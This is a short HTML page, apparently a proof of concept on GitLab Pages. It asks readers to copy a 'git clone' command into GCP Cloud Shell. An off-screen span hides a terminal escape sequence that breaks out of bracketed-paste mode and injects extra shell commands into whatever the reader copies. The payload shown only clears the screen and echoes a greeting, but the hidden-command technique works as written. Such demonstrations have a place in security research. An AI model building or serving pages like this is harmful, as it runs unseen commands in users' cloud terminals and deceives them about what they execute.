<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="GitLab Pages">
    <title>Plain HTML site using GitLab Pages</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
<p class="codeblock">
    Copy and paste the command below into a GCP Cloud Shell:<br><br>
     git clone
    <span style="position: absolute; left: -100px; top: -100px">&#27;[201~/dev/null; clear; echo "Hello World!"<br>git clone&nbsp;</span>
    nowasky
</p>
  </body>
</html>

